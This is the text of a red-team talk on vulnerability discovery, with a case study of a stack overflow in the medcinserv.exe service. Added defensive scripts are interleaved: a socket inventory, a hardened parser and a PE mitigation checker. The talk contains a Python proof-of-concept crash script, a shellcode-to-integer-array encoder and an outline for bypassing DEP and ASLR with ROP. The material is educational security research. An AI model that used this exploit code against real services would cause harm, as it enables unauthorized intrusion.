Software vulnerability discovery and exploitation during red team assessments
Software Vulnerability Discovery & Exploitation During Red Team Assessments
Ryan Wincey [email protected]
9/30/2015
Background
• Long term red team assessments
• Persistence with remote access tools
• Looking for alternative means of network propagation or privilege escalation
Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windows: netstat -ano | findstr LISTEN
• Windows: tasklist /v | findstr <pid>
• Linux: netstat -anop | grep LISTEN
• Linux: ps -ef | grep <pid>
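The command pairs above answer two separate questions (which PID owns a listening socket, and what image and account that PID runs as). The script below is an added example, not part of Ryan Wincey's slides, that joins the two outputs into one inventory so the privileged, non-loopback listeners stand out for review. It runs over constructed sample text in the shape of `netstat -ano` and `tasklist /v /fo csv` output (the CSV form is assumed here because it parses reliably; the slides pipe the default table through findstr), and the set of account names it treats as privileged is an assumption.

```python
import csv
import io

# Constructed sample in the shape of `netstat -ano` LISTENING lines (not captured output).
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING       2312
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       3104
  TCP    [::]:135               [::]:0                 LISTENING       812
"""

# Constructed sample in the shape of `tasklist /v /fo csv` output (not captured output).
TASKLIST_CSV_SAMPLE = r"""\
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","812","Services","0","9,876 K","Unknown","NT AUTHORITY\SYSTEM","0:00:01","N/A"
"System","4","Services","0","132 K","Unknown","NT AUTHORITY\SYSTEM","0:00:10","N/A"
"medcinserv.exe","2312","Services","0","24,120 K","Unknown","NT AUTHORITY\SYSTEM","0:00:02","N/A"
"python.exe","3104","Console","1","18,440 K","Running","LAB\analyst","0:00:00","N/A"
"""

# Assumed list of accounts whose listeners deserve a closer look.
PRIVILEGED_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}
LOOPBACK_HOSTS = {"127.0.0.1", "[::1]"}


def parse_netstat(text):
    """Return (proto, host, port, pid) for every LISTENING line of `netstat -ano`."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[3] != "LISTENING":
            continue
        proto, local, _foreign, _state, pid = parts
        host, port = local.rsplit(":", 1)       # handles both 1.2.3.4:80 and [::]:80
        rows.append((proto, host, int(port), int(pid)))
    return rows


def parse_tasklist_csv(text):
    """Map PID -> (image name, user name) from `tasklist /v /fo csv` output."""
    procs = {}
    for row in csv.DictReader(io.StringIO(text.lstrip("\\\n"))):
        procs[int(row["PID"])] = (row["Image Name"], row["User Name"])
    return procs


def listening_inventory(netstat_text, tasklist_text):
    """Join sockets to processes; privileged + externally reachable listeners sort first."""
    procs = parse_tasklist_csv(tasklist_text)
    inventory = []
    for proto, host, port, pid in parse_netstat(netstat_text):
        image, user = procs.get(pid, ("<unknown>", "<unknown>"))
        inventory.append({
            "proto": proto, "port": port, "pid": pid, "image": image, "user": user,
            "privileged": user.upper() in PRIVILEGED_ACCOUNTS,
            "exposed": host not in LOOPBACK_HOSTS,
        })
    inventory.sort(key=lambda r: (not (r["privileged"] and r["exposed"]), r["port"]))
    return inventory


def review_candidates(netstat_text, tasklist_text):
    """Image names that listen on a non-loopback socket while running as a privileged account."""
    return sorted({r["image"] for r in listening_inventory(netstat_text, tasklist_text)
                   if r["privileged"] and r["exposed"]})


if __name__ == "__main__":
    for r in listening_inventory(NETSTAT_SAMPLE, TASKLIST_CSV_SAMPLE):
        flag = "REVIEW" if r["privileged"] and r["exposed"] else "      "
        print("%s %-4s %5d pid=%-5d %-16s %s" % (flag, r["proto"], r["port"], r["pid"], r["image"], r["user"]))
```

On a real host, feed the script the saved output of the two commands instead of the constructed samples; the same join works for the Linux pair (`netstat -anop` already carries the program name, so only the user lookup from `ps -ef` is needed there).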
Static Analysis
• Reverse Engineering Software
– IDA Pro/Hexrays
– Hopper
– Other
• Target Binary
• Helpful bug hunting tips
– Identify areas where data is introduced from outside of the application
• Command line parameters
• Socket reads
• File reads
• Environment variables
• e.g. read, gets, fread, fgets, recv, recvfrom
– Trace those inputs to parsing functions; look for interesting functions and memory operations
• strcpy, strcat
• sprintf, printf
• memcpy
• system
• any custom string or memory copies
Dynamic Analysis Checklist
• In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment.
• Tips for getting the application to run:
– Zip up support files in the same directory (7za, zip)
– Listdlls.exe, ldd - loaded libraries
– Handle.exe, /proc/<pid> - open files
– Procmon.exe - identify registry keys
– Read log files - track down missing files or registry settings
Analyzing Process Memory
• Comparing the running process environment to your test environment.
• Windows: procdump.exe /accepteula -ma <pid> <dump file>
• Linux: gdb attach <pid>
Crash Dumps
• In the event that you crash the application and want to collect crash dumps:
• Windows: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
– DumpFolder
– DumpCount
– DumpType
– CustomDumpFlags
• Linux: ulimit -c unlimited
Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
• Identify target and binary location
• Static analysis using IDA Pro and HexRays decompiler.
• Locate additional dependencies
• Query service details in registry
• Set up a test environment as nearly identical to the target as possible:
– Operating system
– File system
– Service registration
– Debugging tools
– Scripting support
• Set breakpoint on our vulnerable function
• POC Skeleton
– Define protocol: [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
– Choose implementation: Python, Ruby, PowerShell, C
– Code up the boilerplate / use a template: socket connect, send, recv, formatting
• POC Skeleton (Python 2, reflowed from the two-column slide layout; imports added)

```python
import socket
import struct
import sys

# Wire format: [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
def send(type, pack_len, data=None):
    if pack_len < 6 or pack_len > 0x3d090:
        print "Length must be between 6 and 0x3d090 bytes."
    # Set the type
    buf = struct.pack('>h', type)
    # Send length, must be less than 0x3d090, can be negative
    buf += struct.pack('>i', pack_len)
    # Send data
    if pack_len > 0:
        buf += data
    try:
        # Send data
        csock.send(buf)
    except:
        pass

if len(sys.argv) == 3:
    (progname, host, port) = sys.argv
else:
    print 'Usage: {0} host port'.format(sys.argv[0])
    exit(1)

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((host, int(port)))
csock.settimeout(1)
print "[+] connected to server."

# Try things
i = 238
data = "1," * 1000      # Integer array
print "[+] sending data."
send(i, len(data) + 6, data)
csock.close()
print "[+] goodbye"
```
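The PoC's send() builds the frame and trusts its caller for the length; the receiving side is where the framing rules actually matter. The encoder/decoder below is an added example, not code from the slides and not the medcinserv protocol implementation, that packs the [type:2][length:4][data] frame exactly as the PoC does and shows the checks a receiver of such a format needs: a bounds check on the signed length field (the 6..0x3d090 window quoted in the PoC's comment), agreement between the declared and received length, and a capacity check on the comma-separated integer array before any element is stored. MAX_ENTRIES and FrameError are assumptions, not values from the binary.

```python
import struct

HEADER = struct.Struct(">hi")       # [ Message Type : 2 bytes ][ Data Length : 4 bytes ], big-endian as in the PoC
MIN_LEN, MAX_LEN = 6, 0x3d090       # length window from the PoC's comment; length counts header + data
MAX_ENTRIES = 256                   # assumed capacity of a fixed-size destination array (not from the binary)


class FrameError(ValueError):
    """Raised for any frame a careful receiver should refuse."""


def build_frame(msg_type, payload):
    """Encode one message the way the PoC's send() does."""
    return HEADER.pack(msg_type, HEADER.size + len(payload)) + payload


def parse_frame(buf):
    """Decode one frame, refusing length values that must not be trusted."""
    if len(buf) < HEADER.size:
        raise FrameError("short header")
    msg_type, declared = HEADER.unpack_from(buf)
    # The field is signed: a negative length lands here instead of reaching any size arithmetic.
    if declared < MIN_LEN or declared > MAX_LEN:
        raise FrameError("declared length %d outside [%d, %#x]" % (declared, MIN_LEN, MAX_LEN))
    if declared != len(buf):
        raise FrameError("declared length %d != received %d" % (declared, len(buf)))
    return msg_type, buf[HEADER.size:]


def parse_int_array(payload, capacity=MAX_ENTRIES):
    """Parse a comma-separated list of 32-bit unsigned integers.

    The element count is compared with the destination capacity before anything
    is stored; a parser that copies first and counts later is the pattern that
    turns "1," * 1000 into a stack overwrite.
    """
    text = payload.decode("ascii").rstrip(",")
    fields = text.split(",") if text else []
    if len(fields) > capacity:
        raise FrameError("%d entries exceed capacity %d" % (len(fields), capacity))
    values = []
    for field in fields:
        value = int(field)
        if not 0 <= value <= 0xFFFFFFFF:
            raise FrameError("entry %r is not a 32-bit unsigned value" % field)
        values.append(value)
    return values


def handle(buf):
    """Receiver entry point: frame check, then payload check for the array message type."""
    msg_type, payload = parse_frame(buf)
    if msg_type == 238:
        return msg_type, parse_int_array(payload)
    return msg_type, payload


if __name__ == "__main__":
    good = build_frame(238, b"1,2,3,")
    print("accepted:", handle(good))
    for bad in (build_frame(238, b"1," * 1000), b"\x00\xee\xff\xff\xff\xfe"):
        try:
            handle(bad)
        except FrameError as err:
            print("rejected:", err)
```

The two rejected inputs in the usage block are the PoC's own probe (1000 entries) and a frame with a negative declared length; the same parse_frame() accepts the frame the PoC sends when the array fits.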
• We own EIP
• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.
• Medcinserv.exe doesn't have any built-in protections.
• Bypass DEP by changing the execution permissions of the stack dynamically.
• Change permissions using a ROP chain composed of gadgets from the medcinserv binary.
• Bypass ASLR because ROP gadgets in the medcinserv binary are static.
• NULL bytes are allowed since it's an integer array buffer overflow.
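Whether a binary opted into DEP and ASLR is recorded in the DllCharacteristics field of the PE optional header, so "no built-in protections" is something a build or deployment review can verify before the service ever reaches a production host. The checker below is an added example, not code from the slides; it reads those flags from a PE image in memory and is exercised on a synthetic header it constructs itself (not the real medcinserv.exe). SafeSEH is recorded in the Load Config directory rather than in this field, so the report marks it as not checked.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_FLAGS = {
    "HIGH_ENTROPY_VA": 0x0020,
    "DYNAMIC_BASE":    0x0040,   # ASLR opt-in (/DYNAMICBASE)
    "FORCE_INTEGRITY": 0x0080,
    "NX_COMPAT":       0x0100,   # DEP opt-in (/NXCOMPAT)
    "NO_SEH":          0x0400,
    "GUARD_CF":        0x4000,
}
PE32, PE32_PLUS = 0x10B, 0x20B
DLLCHAR_OFFSET = 70   # offset of DllCharacteristics inside the optional header, same for PE32 and PE32+


def dll_characteristics(image):
    """Return the DllCharacteristics value of a PE image held in memory."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)   # SizeOfOptionalHeader
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (PE32, PE32_PLUS):
        raise ValueError("unknown optional header magic %#x" % magic)
    if opt_size < DLLCHAR_OFFSET + 2:
        raise ValueError("optional header too short")
    (flags,) = struct.unpack_from("<H", image, opt + DLLCHAR_OFFSET)
    return flags


def mitigation_report(image):
    """Map each mitigation flag to True/False; SafeSEH is not derivable from this field."""
    flags = dll_characteristics(image)
    report = {name: bool(flags & bit) for name, bit in DLL_FLAGS.items()}
    report["SAFESEH"] = None   # recorded in the Load Config directory; not parsed here
    return report


def report_file(path):
    """Convenience wrapper for an on-disk binary."""
    with open(path, "rb") as fh:
        return mitigation_report(fh.read())


def build_fake_pe(dll_chars, magic=PE32):
    """Constructed minimal PE header (not a runnable binary) for exercising the parser."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224 if magic == PE32 else 240
    machine = 0x014C if magic == PE32 else 0x8664
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x0102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, magic)
    struct.pack_into("<H", optional, DLLCHAR_OFFSET, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional)


if __name__ == "__main__":
    samples = (
        ("no mitigations", 0),
        ("ASLR+DEP", DLL_FLAGS["DYNAMIC_BASE"] | DLL_FLAGS["NX_COMPAT"]),
    )
    for label, flags in samples:
        print(label, mitigation_report(build_fake_pe(flags)))
```

A service that comes back with DYNAMIC_BASE and NX_COMPAT both False is exactly the situation the slides describe: its own image provides static gadget addresses, and the OS-wide DEP and ASLR on system libraries do not help it. Relinking with /DYNAMICBASE and /NXCOMPAT (and /SAFESEH for 32-bit code) removes that static footing.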
• ROP gadgets generated for VirtualAlloc
• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
• Exploit Design Structure
• Shellcode to String Array Function (Python 2, reflowed from the slide; import and the global it appends to added)

```python
import struct

data = ""   # comma-separated integer array the PoC sends as the message payload

def add_shellcode(sc):
    global data
    # Determine the iterator
    shellcode_len = len(sc)
    iterator = shellcode_len // 4
    if shellcode_len % 4 > 0:
        iterator += 1
    counter = 0
    for i in range(int(iterator)):
        entry = sc[(i * 4):(i * 4) + 4]
        # Make sure length is four bytes
        len_entry = len(entry)
        if len(entry) < 4:
            entry += "\x90" * (4 - len_entry)
        data += str(struct.unpack("<I", entry)[0]) + ","
        counter += 1
    return counter
```
DEMO
Test Exploit
• Test in as nearly identical environment as possible
• Non-critical systems, preferably when users are away
• Make sure to get permission
• Get more shellz
Reporting
• US CERT
• MITRE
• NIST
QUESTIONS?